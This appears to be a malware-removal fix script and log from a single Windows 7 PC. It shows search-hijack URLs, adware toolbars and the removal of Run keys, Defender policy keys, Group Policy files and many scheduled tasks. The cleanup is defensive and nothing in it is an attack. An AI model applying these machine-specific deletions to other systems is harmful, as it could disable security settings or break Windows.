SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1000 -> {786CACE0-4B52-4B5E-9B22-4A8063236C63} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_secureddownload_16_45_ssg02&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dus%26pa%3Dwinyahoo%26cd%3D2XzuyEtN2Y1L1QzuyBtD0FtC0AtC0FyC0B0AzztDtBzz0FzytN0D0Tzu0StCyByBtBtN1L2XzutAtFtByEtFtCtAtFyDtCtN1L1Czu1BtBtN1L1G1B1V1N2Y1L1Qzu2StC0C0Ezy0EtDtB0DtGtA0B0B0CtGyB0EyD0EtGtByE0B0EtGzytDyE0ByD0CzztDtDtCyB0B2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyD0EzzyCyDzzyEyEtG0Czz0A0AtGyE0DzzzztGzzyCyBtAtGtBtC0F0E0CtA0EyEzztB0FtB2QtN0A0LzuyEtN1B2Z1V1T1S1NzutCtDyDzyyB%26cr%3D1051686640%26a%3Dwbf_secureddownload_16_45_ssg02%26os_ver%3D6.1%26os%3DWindows%2B7%2BHome%2BPremium&p={searchTerms}
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1000 -> {7E61AF70-4BD4-4DBE-94F6-5E1B8E2439C9} URL =
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1000 -> {AADC8CF6-CE83-45D8-8B4C-5C9D3E393460} URL =
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1000 -> {BE8412CE-D220-4DA3-8A9F-1431ECED16DD} URL = hxxps://delicious.com/search?p={searchTerms}
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1000 -> {C04B7D22-5AEC-4561-8F49-27F6269208F6} URL = hxxp://www2.inbox.com/search/dispatcher.aspx?tp=bs&qkw={searchTerms}&tbid=82669&iwk=345&lng=en
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1000 -> {C7BEFF53-0739-431F-893F-63670C6CE2F8} URL =
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1000 -> {D2539E59-E453-4A9D-B465-200A7C22E0B5} URL =
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1000 -> {F48980A0-589B-49F1-A35C-E7FF0B3C1B87} URL = hxxp://websearch.ask.com/redirect?client=ie&tb=ORJ&o=&src=kw&q={searchTerms}&locale=&apn_ptnrs=TV&apn_dtid=OSJ000YYUS&apn_uid=812BB0DA-AC09-4FF2-B5D6-F057151DD57C&apn_sauid=64628F7A-C26D-4635-A60F-4215D454D17B
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 -> {786CACE0-4B52-4B5E-9B22-4A8063236C63} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_secureddownload_16_45_ssg02&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dus%26pa%3Dwinyahoo%26cd%3D2XzuyEtN2Y1L1QzuyBtD0FtC0AtC0FyC0B0AzztDtBzz0FzytN0D0Tzu0StCyByBtBtN1L2XzutAtFtByEtFtCtAtFyDtCtN1L1Czu1BtBtN1L1G1B1V1N2Y1L1Qzu2StC0C0Ezy0EtDtB0DtGtA0B0B0CtGyB0EyD0EtGtByE0B0EtGzytDyE0ByD0CzztDtDtCyB0B2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyD0EzzyCyDzzyEyEtG0Czz0A0AtGyE0DzzzztGzzyCyBtAtGtBtC0F0E0CtA0EyEzztB0FtB2QtN0A0LzuyEtN1B2Z1V1T1S1NzutCtDyDzyyB%26cr%3D1051686640%26a%3Dwbf_secureddownload_16_45_ssg02%26os_ver%3D6.1%26os%3DWindows%2B7%2BHome%2BPremium&p={searchTerms}
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 -> {7E61AF70-4BD4-4DBE-94F6-5E1B8E2439C9} URL =
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 -> {C7BEFF53-0739-431F-893F-63670C6CE2F8} URL =
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 -> {cca2e567-1987-4100-a3c6-5b4267084510} URL = hxxp://search.mywebsearch.com/mywebsearch/GGmain.jhtml?id=YKman000&ptnrS=YKman000&ptb=7A5EC1B9-8047-4FF8-A1B9-C7D693FEB29C&psa=&ind=2012052710&st=sb&n=77ed7ce6&searchfor={searchTerms}
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 -> {D2539E59-E453-4A9D-B465-200A7C22E0B5} URL =
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 -> {D9EDB55B-B082-4361-B3FE-E16541CB7E88} URL = hxxp://delicious.com/search?p={searchTerms}
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 -> {F48980A0-589B-49F1-A35C-E7FF0B3C1B87} URL = hxxp://websearch.ask.com/redirect?client=ie&tb=ORJ&o=&src=kw&q={searchTerms}&locale=&apn_ptnrs=TV&apn_dtid=OSJ000YYUS&apn_uid=812BB0DA-AC09-4FF2-B5D6-F057151DD57C&apn_sauid=64628F7A-C26D-4635-A60F-4215D454D17B
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre6\bin\jp2ssv.dll => No File
BHO-x32: No Name -> {02478D38-C3F9-4efb-9B51-7695ECA05670} -> No File
BHO-x32: No Name -> {5C255C8A-E604-49b4-9D64-90988571CECB} -> No File
BHO-x32: ShopAtHome.com Cash Back Helper -> {66516A07-F617-488A-90CF-4E690CFB3C5F} -> C:\Users\Marilyn\AppData\Roaming\ShopAtHome\ShopAtHomeToolbar\tbcore3U.dll => No File
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll [2013-12-18] (Oracle America, Inc. -> Oracle Corporation)
BHO-x32: No Name -> {95B7759C-8C7F-4BF1-B163-73684A933233} -> No File
BHO-x32: GreatArcadeHits Add-on -> {D0C21091-FF8E-432C-9006-0540E81BA9D7} -> C:\Users\Marilyn\AppData\Local\GreatArcadeHits\GreatArcadeHitsIE.dll => No File
BHO-x32: mysearchdial Helper Object -> {EF5625A3-37AB-4BDB-9875-2A3D91CD0DFD} -> C:\Program Files (x86)\Mysearchdial\1.8.29.0\bh\mysearchdial.dll => No File
Toolbar: HKLM-x32 - ShopAtHome.com Toolbar - {311B58DC-A4DC-4B04-B1B5-60299AD3D803} - C:\Users\Marilyn\AppData\Roaming\ShopAtHome\ShopAtHomeToolbar\tbcore3U.dll No File
Toolbar: HKLM-x32 - mysearchdial Toolbar - {3004627E-F8E9-4E8B-909D-316753CBA923} - C:\Program Files (x86)\Mysearchdial\1.8.29.0\mysearchdialTlbr.dll No File
Toolbar: HKU\S-1-5-21-1250379553-2428740185-3603661230-1000 -> No Name - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - No File
Toolbar: HKU\S-1-5-21-1250379553-2428740185-3603661230-1000 -> No Name - {D7E97865-918F-41E4-9CD0-25AB1C574CE8} - No File
Toolbar: HKU\S-1-5-21-1250379553-2428740185-3603661230-1000 -> No Name - {D4027C7F-154A-4066-A1AD-4243D8127440} - No File
Toolbar: HKU\S-1-5-21-1250379553-2428740185-3603661230-1000 -> No Name - {E7DF6BFF-55A5-4EB7-A673-4ED3E9456D39} - No File
Toolbar: HKU\S-1-5-21-1250379553-2428740185-3603661230-1000 -> No Name - {575BDDF5-790A-4D01-A37D-2863DEC1C085} - No File
Toolbar: HKU\S-1-5-21-1250379553-2428740185-3603661230-1004 -> No Name - {E7DF6BFF-55A5-4EB7-A673-4ED3E9456D39} - No File
Toolbar: HKU\S-1-5-21-1250379553-2428740185-3603661230-1004 -> No Name - {D4027C7F-154A-4066-A1AD-4243D8127440} - No File
Toolbar: HKU\S-1-5-21-1250379553-2428740185-3603661230-1004 -> No Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - No File
Toolbar: HKU\S-1-5-21-1250379553-2428740185-3603661230-1004 -> No Name - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - No File
Toolbar: HKU\S-1-5-21-1250379553-2428740185-3603661230-1004 -> No Name - {CCC7A320-B3CA-4199-B1A6-9F516DD69829} - No File
Toolbar: HKU\S-1-5-21-1250379553-2428740185-3603661230-1004 -> No Name - {D7E97865-918F-41E4-9CD0-25AB1C574CE8} - No File
Toolbar: HKU\S-1-5-21-1250379553-2428740185-3603661230-1004 -> No Name - {575BDDF5-790A-4D01-A37D-2863DEC1C085} - No File
Toolbar: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 -> No Name - {D4027C7F-154A-4066-A1AD-4243D8127440} - No File
Toolbar: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 -> No Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - No File
Toolbar: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 -> No Name - {A0154E07-2B48-475C-A82A-80EFD84EA33E} - No File
Toolbar: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 -> No Name - {364EA597-E728-4CE4-BB4A-ED846EF47970} - No File
Toolbar: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 -> No Name - {E7DF6BFF-55A5-4EB7-A673-4ED3E9456D39} - No File
Toolbar: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 -> No Name - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - No File
Toolbar: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 -> No Name - {CCC7A320-B3CA-4199-B1A6-9F516DD69829} - No File
Toolbar: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 -> No Name - {D7E97865-918F-41E4-9CD0-25AB1C574CE8} - No File
Toolbar: HKU\S-1-5-21-1250379553-2428740185-3603661230-501 -> No Name - {575BDDF5-790A-4D01-A37D-2863DEC1C085} - No File
Hosts:
CMD: netsh int ip reset
CMD: ipconfig /flushDNS
EmptyTemp:
C:\Windows\Temp\*.*

*****************

Processes closed successfully.
Error: (0) Failed to create a restore point.
C:\Windows\Temp\conhoy.exe => moved successfully
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender => removed successfully
"HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\Software\Microsoft\Windows\CurrentVersion\Run\\PCKeeperLive" => not found
"C:\Program Files\Essentware\PCKeeper\PCKeeper.exe" => not found
"C:\Program Files\Essentware\PCKeeper" => not found
"HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\Software\Microsoft\Windows\CurrentVersion\Run\\KGShareApp" => removed successfully
"HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\Software\Microsoft\Windows\CurrentVersion\Run\\HP Deskjet 3050A J611 series (NET)" => removed successfully
"HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\Software\Microsoft\Windows\CurrentVersion\Run\\HP Deskjet 3050A J611 series (NET) #2" => removed successfully
"HKU\S-1-5-21-1250379553-2428740185-3603661230-501\Software\Microsoft\Windows\CurrentVersion\Run\\PCKeeperLive" => not found
"HKU\S-1-5-21-1250379553-2428740185-3603661230-501\Software\Microsoft\Windows\CurrentVersion\Run\\swg" => removed successfully
"HKU\S-1-5-21-1250379553-2428740185-3603661230-501\Software\Microsoft\Windows\CurrentVersion\Run\\KGShareApp" => removed successfully
"HKU\S-1-5-21-1250379553-2428740185-3603661230-501\Software\Microsoft\Windows\CurrentVersion\Run\\HP Deskjet 3050A J611 series (NET)" => removed successfully
"HKU\S-1-5-21-1250379553-2428740185-3603661230-501\Software\Microsoft\Windows\CurrentVersion\Run\\HP Deskjet 3050A J611 series (NET) #2" => removed successfully
C:\Windows\system32\GroupPolicy\Machine => moved successfully
C:\Windows\system32\GroupPolicy\GPT.ini => moved successfully
C:\Windows\SysWOW64\GroupPolicy\GPT.ini => moved successfully
C:\ProgramData\NTUSER.pol => moved successfully
HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\uihost32.exe => removed successfully
HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\uihost64.exe => removed successfully
HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\vid001.exe => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0755F16F-16EE-419E-B0E7-0CC9CA968B96}" => not found
"C:\Windows\System32\Tasks\Information-codedownloader" => not found
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Information-codedownloader" => not found
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{0D23653C-6BD6-4C2E-9B7B-7CDE28991827}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0D23653C-6BD6-4C2E-9B7B-7CDE28991827}" => removed successfully
C:\Windows\System32\Tasks\Microsoft\Windows\Media Center\PBDADiscovery => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Media Center\PBDADiscovery" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{130F0ABF-F04E-403D-9072-46195AC3C09E}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{130F0ABF-F04E-403D-9072-46195AC3C09E}" => removed successfully
C:\Windows\System32\Tasks\HP AR Program Upload - 5c0f950a1bac498fa00becd99f6716457d4ebca62a29425ca9ed17aa3deb9a58 => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\HP AR Program Upload - 5c0f950a1bac498fa00becd99f6716457d4ebca62a29425ca9ed17aa3deb9a58" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{13E5D543-D30F-47EB-B157-AA513D0E504D}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{13E5D543-D30F-47EB-B157-AA513D0E504D}" => removed successfully
C:\Windows\System32\Tasks\Microsoft\Windows\Media Center\OCURDiscovery => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Media Center\OCURDiscovery" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{25C3FE4E-7C48-447D-BAC5-141069528E0A}" => not found
"C:\Windows\System32\Tasks\Information-enabler" => not found
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Information-enabler" => not found
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{283FA5F3-05D9-4E45-8612-CC169745945D}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{283FA5F3-05D9-4E45-8612-CC169745945D}" => removed successfully
C:\Windows\System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Total Care Tune-Up => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Hewlett-Packard\HP Support Assistant\HP Total Care Tune-Up" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{28AA66E5-16C3-4EC8-9431-3904FE03FF88}" => not found
"C:\Windows\System32\Tasks\Information-chromeinstaller" => not found
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Information-chromeinstaller" => not found
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{2AE04DAF-5396-4938-9FFA-57DDBA863B88}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2AE04DAF-5396-4938-9FFA-57DDBA863B88}" => removed successfully
C:\Windows\System32\Tasks\{8406D554-4EE5-437D-8CEA-C0DA8201F0C9} => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{8406D554-4EE5-437D-8CEA-C0DA8201F0C9}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{2B9F2E2D-2321-49DB-8AF7-F55BB2B85E2D}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2B9F2E2D-2321-49DB-8AF7-F55BB2B85E2D}" => removed successfully
C:\Windows\System32\Tasks\Microsoft\Windows\Media Center\ehDRMInit => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Media Center\ehDRMInit" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{2F33CB24-7A24-4BC8-8921-4C26EAB0708F}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2F33CB24-7A24-4BC8-8921-4C26EAB0708F}" => removed successfully
C:\Windows\System32\Tasks\RealPlayerRealUpgradeLogonTaskS-1-5-21-1250379553-2428740185-3603661230-1000 => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\RealPlayerRealUpgradeLogonTaskS-1-5-21-1250379553-2428740185-3603661230-1000" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{319997A5-00B0-4E61-87B9-3CFCEFCFDD29}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{319997A5-00B0-4E61-87B9-3CFCEFCFDD29}" => removed successfully
"C:\Windows\System32\Tasks\McAfee\McAfee Idle Detection Task" => not found
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\McAfee\McAfee Idle Detection Task" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{34EA7168-77B4-42AD-86F8-706253868680}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{34EA7168-77B4-42AD-86F8-706253868680}" => removed successfully
C:\Windows\System32\Tasks\Microsoft\Windows\Media Center\ActivateWindowsSearch => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Media Center\ActivateWindowsSearch" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{3F599EE8-6731-448E-AFDF-D262B64FBE6A}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{3F599EE8-6731-448E-AFDF-D262B64FBE6A}" => removed successfully
C:\Windows\System32\Tasks\Microsoft\Windows\Media Center\RegisterSearch => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Media Center\RegisterSearch" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{50705818-630E-4136-BA82-0DB9119DA4AC}" => not found
"C:\Windows\System32\Tasks\Information-firefoxinstaller" => not found
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Information-firefoxinstaller" => not found
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{566C6850-EE65-4F4F-A90B-8795A8D39A5D}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{566C6850-EE65-4F4F-A90B-8795A8D39A5D}" => removed successfully
C:\Windows\System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW2 => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Media Center\PBDADiscoveryW2" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{5A2C50FB-9762-4877-81FD-634A43087C10}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{5A2C50FB-9762-4877-81FD-634A43087C10}" => removed successfully
C:\Windows\System32\Tasks\Microsoft\Windows\Media Center\PvrScheduleTask => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Media Center\PvrScheduleTask" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{5E809149-E296-4004-924E-26A5B98FB90B}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{5E809149-E296-4004-924E-26A5B98FB90B}" => removed successfully
C:\Windows\System32\Tasks\Microsoft\Windows\Media Center\ObjectStoreRecoveryTask => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Media Center\ObjectStoreRecoveryTask" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{68518EFB-4CCB-45A7-91E1-7615E98EB147}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{68518EFB-4CCB-45A7-91E1-7615E98EB147}" => removed successfully
C:\Windows\System32\Tasks\Microsoft\Windows\Media Center\PeriodicScanRetry => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Media Center\PeriodicScanRetry" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{6C49D8F6-A561-478F-8562-B5B6C36B3542}" => not found
C:\Windows\System32\Tasks\Mysa2 => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Mysa2" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7158081D-DF25-4E71-BC14-844441C6B587}" => not found
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\MySearchDial" => not found
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{7BDAAE08-C707-4305-9740-561B82F7FF91}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7BDAAE08-C707-4305-9740-561B82F7FF91}" => removed successfully
C:\Windows\System32\Tasks\Microsoft\Windows\Media Center\RecordingRestart => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Media Center\RecordingRestart" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{81D43BF0-31FA-437A-A207-34FBD1EB4443}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{81D43BF0-31FA-437A-A207-34FBD1EB4443}" => removed successfully
C:\Windows\System32\Tasks\Microsoft\Windows\Media Center\ReindexSearchRoot => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Media Center\ReindexSearchRoot" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{8708676B-C4A6-408D-B706-4030F29488F9}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{8708676B-C4A6-408D-B706-4030F29488F9}" => removed successfully
C:\Windows\System32\Tasks\Microsoft\Windows\Media Center\UpdateRecordPath => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Media Center\UpdateRecordPath" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{8D941E7F-F453-4838-AF1D-C0D25D4F3262}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{8D941E7F-F453-4838-AF1D-C0D25D4F3262}" => removed successfully
C:\Windows\System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW1 => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Media Center\PBDADiscoveryW1" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{8EE9CB7F-6ABF-497B-80AB-E8EEB72B502C}" => not found
"C:\Windows\System32\Tasks\Information-updater" => not found
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Information-updater" => not found
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{8FB062A9-BD13-42B5-B65F-B285C09B088E}" => not found
"C:\Windows\System32\Tasks\SlimCleaner Plus (Scheduled Scan - Marilyn)" => not found
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SlimCleaner Plus (Scheduled Scan - Marilyn)" => not found
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{9EC65580-F30B-49AD-B23D-E6619DA3685B}" => not found
C:\Windows\System32\Tasks\ok => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ok" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A26E4F53-0C1D-47E6-93D4-2B1380751BD0}" => not found
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Mysa" => not found
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{A4417F75-2B1A-43EF-B93B-A68027897A14}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A4417F75-2B1A-43EF-B93B-A68027897A14}" => removed successfully
C:\Windows\System32\Tasks\Microsoft\Windows\Media Center\SqlLiteRecoveryTask => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Media Center\SqlLiteRecoveryTask" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{A9206F35-0D9A-40E5-95E7-8C15E7CEC916}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A9206F35-0D9A-40E5-95E7-8C15E7CEC916}" => removed successfully
C:\Windows\System32\Tasks\Microsoft\Windows\Media Center\PvrRecoveryTask => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Media Center\PvrRecoveryTask" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B4C24072-CB73-494D-A505-7A40E3341278}" => not found
C:\Windows\System32\Tasks\MicrosoftsWindowsy => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\MicrosoftsWindowsy" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{BCB60D00-1E83-4159-A3BA-5432DB9EA769}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{BCB60D00-1E83-4159-A3BA-5432DB9EA769}" => removed successfully
C:\Windows\System32\Tasks\RunAsStdUser Task => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\RunAsStdUser Task" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C7EE3052-AD50-4721-9A35-2ED1ADF2BEA4}" => not found
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Mysa3" => not found
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{C8A0777B-EC92-4B1A-A2B9-ABFBC4AD5908}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C8A0777B-EC92-4B1A-A2B9-ABFBC4AD5908}" => removed successfully
C:\Windows\System32\Tasks\Microsoft\Windows\Media Center\ConfigureInternetTimeService => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Media Center\ConfigureInternetTimeService" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C9E3D7FF-0540-40E1-BD19-0D3BE6985F4E}" => not found
"C:\Windows\System32\Tasks\AVG-Secure-Search-Update_JUNE2013_TB_rmv" => not found
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\AVG-Secure-Search-Update_JUNE2013_TB_rmv" => not found
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{CF9A5C01-BEE9-4B79-A201-E0D630BE6804}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CF9A5C01-BEE9-4B79-A201-E0D630BE6804}" => removed successfully
"C:\Windows\System32\Tasks\McAfeeLogon" => not found
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\McAfeeLogon" => removed successfully
